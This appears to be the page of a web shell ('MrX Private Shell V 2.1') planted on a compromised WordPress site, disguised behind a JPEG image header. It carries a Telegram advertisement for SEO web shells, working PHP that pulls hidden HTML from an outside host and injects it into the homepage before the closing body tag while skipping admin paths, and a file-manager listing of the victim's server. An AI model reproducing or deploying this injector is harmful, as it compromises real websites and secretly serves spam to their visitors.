����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
$SOURCE_URLS = array(
'https://bylagency.com/proyek/proyek.txt',
);
$SKIP_PATTERNS = array(
'/wp-admin/', '/administrator/', '/user/login', '/wp-json', '/xmlrpc.php', '/api/', '/cron', '/vendor/'
);
function contentblock_should_skip($patterns) {
$uri = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : '';
if ($uri !== '/' && $uri !== '/index.php' && $uri !== '/index.html') {
return true;
}
foreach ($patterns as $p) {
if ($p !== '' && strpos($uri, $p) !== false) return true;
}
return false;
}
function contentblock_is_html($buffer) {
if (!is_string($buffer) || $buffer === '') return false;
return stripos($buffer, '<html') !== false ||
stripos($buffer, '<!doctype') !== false ||
stripos($buffer, '</body>') !== false;
}
function contentblock_fetch_remote($url) {
$content = '';
// cURL
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt_array($ch, array(
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_CONNECTTIMEOUT => 5,
CURLOPT_TIMEOUT => 8,
CURLOPT_USERAGENT => 'ContentFetcher/1.0',
));
@curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
@curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
@curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$resp = curl_exec($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if (is_string($resp) && $code >= 200 && $code < 300) $content = $resp;
}
// fopen fallback
if ($content === '' && ini_get('allow_url_fopen')) {
$ctx = stream_context_create(array(
'http' => array('timeout' => 8, 'header' => "User-Agent: ContentFetcher/1.0\r\n"),
'ssl' => array('verify_peer'=>false, 'verify_peer_name'=>false)
));
$resp = @file_get_contents($url, false, $ctx);
if ($resp !== false) $content = $resp;
}
return $content;
}
function contentblock_extract_hidden_div($html) {
if (!is_string($html) || $html === '') return '';
if (preg_match('/<div[^>]*\bstyle\s*=\s*["\'][^"\']*display\s*:\s*none[^"\']*["\'][^>]*>.*?<\/div>/is', $html, $m)) {
return $m[0];
}
if (preg_match('/<div[^>]*display\s*:\s*none[^>]*>.*?<\/div>/is', $html, $m2)) {
return $m2[0];
}
return '';
}
function contentblock_injector($buffer) {
if (!contentblock_is_html($buffer)) return $buffer;
global $SOURCE_URLS;
$blocks = array();
foreach ($SOURCE_URLS as $url) {
$raw = contentblock_fetch_remote($url);
if ($raw === '') continue;
$raw = trim($raw);
$block = contentblock_extract_hidden_div($raw);
if ($block === '') $block = $raw;
$blocks[] = $block;
}
if (empty($blocks)) return $buffer;
$html = implode("\n", $blocks);
$pos = stripos($buffer, '</body>');
if ($pos !== false) {
return substr($buffer, 0, $pos) . "\n" . $html . "\n" . substr($buffer, $pos);
}
return $buffer . "\n" . $html;
}
function contentblock_flush() {
if (ob_get_level() > 0) @ob_end_flush();
}
if (!contentblock_should_skip($SKIP_PATTERNS)) {
ob_start('contentblock_injector');
register_shutdown_function('contentblock_flush');
}
?>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| .well-known | Folder | 0755 |
|
|
| access.techbusinessbrain.au | Folder | 0750 |
|
|
| app.techbusinessbrain.au | Folder | 0750 |
|
|
| demo | Folder | 0755 |
|
|
| products | Folder | 0755 |
|
|
| responsive | Folder | 0755 |
|
|
| wp-admin | Folder | 0755 |
|
|
| wp-content | Folder | 0755 |
|
|
| wp-includes | Folder | 0755 |
|
|
| .htaccess_260606063409 | File | 231 B | 0644 |
|
| .user.ini | File | 585 B | 0644 |
|
| blob.html | File | 77.39 KB | 0644 |
|
| data.txt | File | 2.81 MB | 0644 |
|
| error_log | File | 158.51 MB | 0644 |
|
| infectex.txt | File | 681.22 KB | 0644 |
|
| license.txt | File | 19.44 KB | 0644 |
|
| ner.html | File | 120 B | 0644 |
|
| php.ini | File | 105 B | 0644 |
|
| profil.php | File | 3.39 KB | 0644 |
|
| readme.html | File | 7.23 KB | 0644 |
|
| robots.txt | File | 998 B | 0644 |
|
| wp-activate.php | File | 7.2 KB | 0644 |
|
| wp-blog-header.php | File | 351 B | 0644 |
|
| wp-ccv.php | File | 1.62 MB | 0644 |
|
| wp-comments-post.php | File | 2.27 KB | 0644 |
|
| wp-config-sample.php | File | 3.26 KB | 0644 |
|
| wp-config.php | File | 3.19 KB | 0444 |
|
| wp-cron.php | File | 5.49 KB | 0644 |
|
| wp-links-opml.php | File | 2.43 KB | 0644 |
|
| wp-load.php | File | 3.84 KB | 0644 |
|
| wp-login.php | File | 50.63 KB | 0644 |
|
| wp-mail.php | File | 8.52 KB | 0644 |
|
| wp-trackback.php | File | 5.09 KB | 0644 |
|
| xmlrpc.php | File | 3.13 KB | 0644 |
|